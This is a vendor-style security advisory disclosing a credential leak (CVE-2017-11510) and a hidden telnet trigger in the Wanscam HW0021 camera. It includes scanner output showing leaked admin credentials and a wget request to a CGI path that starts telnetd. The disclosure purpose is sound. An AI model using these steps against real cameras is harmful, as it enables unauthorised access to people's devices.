Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Wanscam Network Camera Multiple Vulnerabiltiies

Medium

Synopsis

While investigating Pierre Kim's disclosure, Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server, Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities FSecure encountered in Foscam devices. Its unclear to Tenable how Foscam and Wanscam are related.

CVE-2017-11510: Administrator Username and Password Disclosure

The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation:
LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl 
----------[ Executing onvif_detect.nbin ]------

The ONVIF service listening on UDP port 3702 advertises
the following information:

Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0

audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:

http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media

----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------

It was possible to obtain a screenshot from the following URL
on the remote camera: 

http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&

----------[ Finished ./onvif_get_snapshot.nasl ]------
You can see the username (admin) and password (cheesedoodle) in the final plugin.

Hidden Telnet Functionality

Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi then telnetd starts up.
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
albinolobster@ubuntu:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.

IPCamera login: 

Solution

A patch has not been published.

Disclosure Timeline

08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected] [email protected] [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenables responds that we understand that but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2017-11510
Tenable Advisory ID: TRA-2017-33
Credit:
Jacob Baines, Tenable Network Security
CVSSv2 Base / Temporal Score:
5.0 / 5.0
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:P/I:N/A:N
Affected Products:
Wanscam HW0021 firmware 11.6.5.1.1-20161213
Risk Factor:
Medium

Advisory Timeline

2017-11-10 - [R1] Initial Release